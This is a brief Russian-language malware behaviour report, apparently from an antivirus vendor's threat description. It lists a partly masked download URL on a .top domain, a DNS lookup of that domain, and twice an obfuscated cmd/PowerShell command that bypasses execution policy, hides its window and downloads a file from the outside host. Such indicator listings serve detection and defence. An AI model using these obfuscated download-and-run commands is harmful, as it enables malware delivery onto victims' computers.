Техническая информация
- http://ne###argoka.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^Wershel^l.E^XE ^-EX^EcUT^i^ON^P^O^licy b^YpASs -no^PROFil^E ^-winDow^STYlE^ hidDE^N ^(nE^W-OBJ^E^c^T SySteM.nET.wEbClIE^N^T).D^Ow^Nlo^aDfile(^'http://ne###argoka.top/r...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "Po^Wershel^l.E^XE ^-EX^EcUT^i^ON^P^O^licy b^YpASs -no^PROFil^E ^-winDow^STYlE^ hidDE^N ^(nE^W-OBJ^E^c^T SySteM.nET.wEbClIE^N^T).D^Ow^Nlo^aDfile(^'http://ne###argoka.top/r...' (со скрытым окном)